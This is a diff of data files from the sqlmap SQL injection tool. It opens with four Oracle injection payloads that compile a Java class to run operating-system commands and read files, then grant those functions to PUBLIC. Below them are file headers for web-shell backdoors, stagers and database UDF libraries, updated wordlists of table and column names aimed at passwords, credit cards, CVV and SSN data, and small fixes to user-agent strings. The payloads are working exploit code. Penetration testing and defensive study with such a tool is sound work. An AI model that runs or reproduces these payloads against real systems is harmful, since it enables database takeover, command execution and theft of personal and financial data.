 SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
 SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
 SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
 SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
--- a/data/procs/postgresql/dns_request.sql
+++ b/data/procs/postgresql/dns_request.sql
--- a/data/shell/README.txt
+++ b/data/shell/README.txt
--- a/data/shell/backdoors/backdoor.asp_
+++ b/data/shell/backdoors/backdoor.asp_
--- a/data/shell/backdoors/backdoor.aspx_
+++ b/data/shell/backdoors/backdoor.aspx_
--- a/data/shell/backdoors/backdoor.jsp_
+++ b/data/shell/backdoors/backdoor.jsp_
--- a/data/shell/backdoors/backdoor.php_
+++ b/data/shell/backdoors/backdoor.php_
--- a/data/shell/stagers/stager.asp_
+++ b/data/shell/stagers/stager.asp_
--- a/data/shell/stagers/stager.aspx_
+++ b/data/shell/stagers/stager.aspx_
--- a/data/shell/stagers/stager.jsp_
+++ b/data/shell/stagers/stager.jsp_
--- a/data/shell/stagers/stager.php_
+++ b/data/shell/stagers/stager.php_
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 id
@@ -474,6 +474,7 @@ module_addr
 flag
 # spanish
 usuario
 nombre
 contrasena
@@ -486,6 +487,7 @@ tono
 cuna
 # german
 benutzername
 benutzer
 passwort
@@ -499,6 +501,7 @@ stichwort
 schlusselwort
 # french
 utilisateur
 usager
 consommateur
@@ -510,6 +513,7 @@ touche
 clef
 # italian
 utente
 nome
 utilizzatore
@@ -521,17 +525,109 @@ chiavetta
 cifrario
 # portuguese
 usufrutuario
 chave
 cavilha
 # slavic
 korisnik
 sifra
 lozinka
 kljuc
 # turkish
 isim
 ad
 adi
 soyisim
 soyad
 soyadi
 kimlik
 kimlikno
 tckimlikno
 tckimlik
 yonetici
 sil
 silinmis
 numara
 sira
 lokasyon
 kullanici
 kullanici_adi
 sifre
 giris
 pasif
 posta
 adres
 is_adres
 ev_adres
 is_adresi
 ev_adresi
 isadresi
 isadres
 evadresi
 evadres
 il
 ilce
 eposta
 eposta_adres
 epostaadres
 eposta_adresi
 epostaadresi
 e-posta
 e-posta_adres
 e-postaadres
 e-posta_adresi
 e-postaadresi
 e_posta
 e_posta_adres
 e_postaadres
 e_posta_adresi
 e_postaadresi
 baglanti
 gun
 ay
 yil
 saat
 tarih
 guncelleme
 guncellemetarih
 guncelleme_tarih
 guncellemetarihi
 guncelleme_tarihi
 yetki
 cinsiyet
 ulke
 guncel
 vergi
 vergino
 vergi_no
 yas
 dogum
 dogumtarih
 dogum_tarih
 dogumtarihi
 dogum_tarihi
 telefon_is
 telefon_ev
 telefonis
 telefonev
 ev_telefonu
 is_telefonu
 ev_telefon
 is_telefon
 evtelefonu
 istelefonu
 evtelefon
 istelefon
 kontak
 kontaklar
 # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)
 user
 pass
 cc_number
@@ -755,6 +851,7 @@ xar_name
 xar_pass
 # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
 account
 accnts
 accnt
@@ -824,6 +921,7 @@ user_pwd
 user_passwd
 # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)
 fld_id
 fld_username
 fld_password
@@ -976,6 +1074,7 @@ yhmm
 yonghu
 # site:br
 content_id
 codigo
 geometry
@@ -1232,6 +1331,7 @@ newssummaryauthor
 and_xevento
 # site:de
 rolle_nr
 standort_nr
 ja
@@ -1394,6 +1494,7 @@ summary_id
 gameid
 # site:es
 catid
 dni
 prune_id
@@ -1483,6 +1584,7 @@ time_stamp
 bannerid
 # site:fr
 numero
 id_auteur
 titre
@@ -1534,6 +1636,7 @@ n_dir
 age
 # site:ru
 dt_id
 subdivision_id
 sub_class_id
@@ -1739,6 +1842,7 @@ language_id
 val
 # site:jp
 dealer_id
 modify_date
 regist_date
@@ -1870,6 +1974,7 @@ c_commu_topic_id
 c_diary_comment_log_id
 # site:it
 idcomune
 idruolo
 idtrattamento
@@ -2373,6 +2478,7 @@ client_img
 does_repeat
 # site:cn
 typeid
 cronid
 advid
@@ -2548,6 +2654,7 @@ disablepostctrl
 fieldname
 # site:id
 ajar
 akses
 aktif
@@ -2599,9 +2706,23 @@ urut
 waktu
 # WebGoat
 cookie
 login_count
 # https://sqlwiki.netspi.com/attackQueries/dataTargeting/
 credit
 card
 pin
 cvv
 pan
 password
 social
 ssn
 account
 confidential
 # Misc
 u_pass
--- a/data/txt/common-files.txt
+++ b/data/txt/common-files.txt
--- a/data/txt/common-outputs.txt
+++ b/data/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 [Banners]
--- a/data/txt/common-tables.txt
+++ b/data/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 users
@@ -1618,6 +1618,7 @@ Contributor
 flag
 # Various Joomla tables
 jos_vm_product_download
 jos_vm_coupons
 jos_vm_product_reviews
@@ -1711,6 +1712,7 @@ publicusers
 cmsusers
 # List provided by Anastasios Monachos (anastasiosm@gmail.com)
 blacklist
 cost
 moves
@@ -1762,6 +1764,7 @@ TBLCORPUSERS
 TBLCORPORATEUSERS
 # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)
 tbladmins
 sort
 _wfspro_admin
@@ -2048,6 +2051,7 @@ Login
 Logins
 # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
 account
 accnts
 accnt
@@ -2117,6 +2121,7 @@ user_pwd
 user_passwd
 # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)
 wsop
 Admin
 Config
@@ -2437,9 +2442,11 @@ Affichage1name
 sb_host_adminAffichage1name
 # site:jp
 TypesTab
 # site:it
 utenti
 categorie
 attivita
@@ -2581,6 +2588,7 @@ oil_stats_agents
 SGA_XPLAN_TPL_DBA_INDEXES
 # site:fr
 Avion
 departement
 Compagnie
@@ -2751,6 +2759,7 @@ spip_ortho_dico
 spip_caches
 # site:ru
 guestbook
 binn_forum_settings
 binn_forms_templ
@@ -2848,6 +2857,7 @@ binn_path_temps
 order_item
 # site:de
 tt_content
 kunde
 medien
@@ -3010,6 +3020,7 @@ wp_categories
 chessmessages
 # site:br
 endereco
 pessoa
 usuarios
@@ -3172,6 +3183,7 @@ LT_CUSTOM2
 LT_CUSTOM3
 # site:es
 jos_respuestas
 DEPARTAMENTO
 EMPLEADO
@@ -3210,6 +3222,7 @@ grupo
 facturas
 # site:cn
 url
 cdb_adminactions
 BlockInfo
@@ -3354,7 +3367,55 @@ aliastype
 mymps_mail_sendlist
 mymps_navurl
 # site:tr
 kullanici
 kullanicilar
 yonetici
 yoneticiler
 adres
 adresler
 yayincilar
 yayinci
 urun
 urunler
 kategori
 kategoriler
 ulke
 ulkeler
 siparis
 siparisler
 bayi
 bayiler
 stok
 reklam
 reklamlar
 site
 siteler
 sayfa
 sayfalar
 icerik
 icerikler
 yazi
 yazilar
 genel
 istatistik
 istatistikler
 duyuru
 duyurular
 haber
 haberler
 komisyon
 ucret
 ucretler
 bilgi
 basvuru
 basvurular
 kontak
 kontaklar
 # List provided by Pedrito Perez (0ark1ang3l@gmail.com)
 adminstbl
 admintbl
 affiliateUsers
@@ -3369,4 +3430,69 @@ userstbl
 usertbl
 # WebGoat
 user_data
 # https://laurent22.github.io/so-injections/
 accounts
 admin
 baza_site
 benutzer
 category
 comments
 company
 credentials
 Customer
 customers
 data
 details
 dhruv_users
 dt_tb
 employees
 events
 forsale
 friends
 giorni
 images
 info
 items
 kontabankowe
 login
 logs
 markers
 members
 messages
 orders
 order_table
 photos
 player
 players
 points
 register
 reports
 rooms
 shells
 signup
 songs
 student
 students
 table
 table2
 tbl_images
 tblproduct
 testv2
 tickets
 topicinfo
 trabajo
 user
 user_auth
 userinfo
 user_info
 userregister
 users
 usuarios
 utenti
 wm_products
 wp_payout_history
 zamowienia
--- a/data/txt/keywords.txt
+++ b/data/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
--- a/data/txt/smalldict.txt
+++ b/data/txt/smalldict.txt
--- a/data/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Opera
@@ -285,7 +285,6 @@ Opera/9.20 (X11; Linux i686; U; es-es)
 Opera/9.20 (X11; Linux i686; U; pl)
 Opera/9.20 (X11; Linux i686; U; ru)
 Opera/9.20 (X11; Linux i686; U; tr)
 Opera/9.20 (X11; Linux ppc; U; en)
 Opera/9.20 (X11; Linux x86_64; U; en)
 Opera/9.21 (Macintosh; Intel Mac OS X; U; en)
 Opera/9.21 (Macintosh; PPC Mac OS X; U; en)
@@ -364,8 +363,8 @@ Opera/9.27 (Windows NT 5.1; U; ja)
 Opera/9.27 (Windows NT 5.2; U; en)
 Opera/9.27 (X11; Linux i686; U; en)
 Opera/9.27 (X11; Linux i686; U; fr)
-Opera 9.4 (Windows NT 5.3; U; en)
+Opera/9.4 (Windows NT 5.3; U; en)
-Opera 9.4 (Windows NT 6.1; U; en)
+Opera/9.4 (Windows NT 6.1; U; en)
 Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
 Opera/9.50 (Macintosh; Intel Mac OS X; U; en)
 Opera/9.50 (Windows NT 5.1; U; es-ES)
@@ -375,7 +374,6 @@ Opera/9.50 (Windows NT 5.1; U; nn)
 Opera/9.50 (Windows NT 5.1; U; ru)
 Opera/9.50 (Windows NT 5.2; U; it)
 Opera/9.50 (X11; Linux i686; U; es-ES)
 Opera/9.50 (X11; Linux ppc; U; en)
 Opera/9.50 (X11; Linux x86_64; U; nb)
 Opera/9.50 (X11; Linux x86_64; U; pl)
 Opera/9.51 (Macintosh; Intel Mac OS X; U; en)
@@ -406,7 +404,6 @@ Opera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en)
 Opera/9.52 (X11; Linux i686; U; cs)
 Opera/9.52 (X11; Linux i686; U; en)
 Opera/9.52 (X11; Linux i686; U; fr)
 Opera/9.52 (X11; Linux ppc; U; de)
 Opera/9.52 (X11; Linux x86_64; U)
 Opera/9.52 (X11; Linux x86_64; U; en)
 Opera/9.52 (X11; Linux x86_64; U; ru)
@@ -616,7 +613,6 @@ Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02
 # Mozilla Firefox
 mozilla/3.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/5.0.1
 Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)
 Mozilla/4.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/2010324480 Firefox/3.5.4
 Mozilla/4.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.7) Gecko/2008398325 Firefox/3.1.4
@@ -1125,7 +1121,7 @@ Mozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.9b5) Gecko/2008032620 Firefox/
 Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
 Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
 Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
-Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6
+Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6
 Mozilla/5.0 (Windows; U; Windows NT 5.2; sk; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
 Mozilla/5.0 (Windows; U; Windows NT 5.2 x64; en-US; rv:1.9a1) Gecko/20060214 Firefox/1.6a1
 Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5
@@ -1355,7 +1351,7 @@ Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.14) Gecko/20110218 Fire
 Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
 Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
 Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729)
-Mozilla/5.0(Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6
+Mozilla/5.0 (Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6
 Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1.0
 Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
 Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
@@ -1385,7 +1381,6 @@ Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0
 Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
 Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0
 Mozilla/5.0 (X11; Linux i686; U; pl; rv:1.8.1) Gecko/20061208 Firefox/2.0.0
 Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0
 Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0
 Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110506 Firefox/4.0.1
 Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4
@@ -2209,13 +2204,6 @@ Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04
 Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7
 Mozilla/5.0 (X11; U; Linux ia64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
 Mozilla/5.0 (X11; U; Linux MIPS32 1074Kf CPS QuadCore; en-US; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
 Mozilla/5.0 (X11; U; Linux ppc64; en-US; rv:1.8.1.14) Gecko/20080418 Ubuntu/7.10 (gutsy) Firefox/2.0.0.14
 Mozilla/5.0 (X11; U; Linux ppc; da-DK; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)
 Mozilla/5.0 (X11; U; Linux ppc; en-GB; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12
 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.7.12) Gecko/20051222 Firefox/1.0.7
 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.3) Gecko/20070310 Firefox/2.0.0.3 (Debian-2.0.0.3-1)
 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4
 Mozilla/5.0 (X11; U; Linux ppc; fr; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
 Mozilla/5.0 (X11; U; Linux sparc64; en-US; rv:1.8.1.17) Gecko/20081108 Firefox/2.0.0.17
 Mozilla/5.0 (X11; U; Linux x64_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3
 Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4
@@ -2547,7 +2535,6 @@ Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.6) Gecko/20070819 Firefox/2.0
 Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.7) Gecko/20070930 Firefox/2.0.0.7
 Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20
 Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8
 Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.0.10) Gecko/20070223 Firefox/1.5.0.10
 Mozilla/5.0 (X11; U; OpenBSD sparc64; en-AU; rv:1.8.1.6) Gecko/20071225 Firefox/2.0.0.6
 Mozilla/5.0 (X11; U; OpenBSD sparc64; en-CA; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2
 Mozilla/5.0 (X11; U; OpenBSD sparc64; en-US; rv:1.8.1.6) Gecko/20070816 Firefox/2.0.0.6
@@ -3452,16 +3439,6 @@ Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; DigExt)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; Hotbar 3.0)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; PPC)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone; 176x220)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint;PPC-i830; PPC; 240x320)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:PPC-i830; PPC; 240x320)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i320; Smartphone; 176x220)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint; SCH-i830; PPC; 240x320)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i830; PPC; 240x320)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip320; Smartphone; 176x220)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip830w; PPC; 240x320)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
 Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
 Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)
@@ -3597,7 +3574,6 @@ Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1)
 Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
 Mozilla/4.0 (MSIE 6.0; Windows NT 5.0)
 Mozilla/4.0 (MSIE 6.0; Windows NT 5.1)
 Mozilla/4.0 PPC (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)
 Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)
 Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.0)
 Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
@@ -3605,8 +3581,6 @@ Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.2)
 Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)
 Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
 Mozilla/4.0 (X11; MSIE 6.0; i686; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM)
 Mozilla/45.0 (compatible; MSIE 6.0; Windows NT 5.1)
 Mozilla/4.79 [en] (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
 Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)
 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
@@ -3809,7 +3783,6 @@ Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.18 (KHTM
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 iPhone
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 Safari/525.9
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
@@ -4209,4 +4182,4 @@ Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN) AppleWebKit/533+ (KHTML, like Ge
 Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
 Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
 Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
-Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
+Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
--- a/data/txt/wordlist.tx_
+++ b/data/txt/wordlist.tx_
--- a/data/udf/README.txt
+++ b/data/udf/README.txt
--- a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
+++ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
--- a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
+++ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
--- a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
+++ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
--- a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
+++ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
--- a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
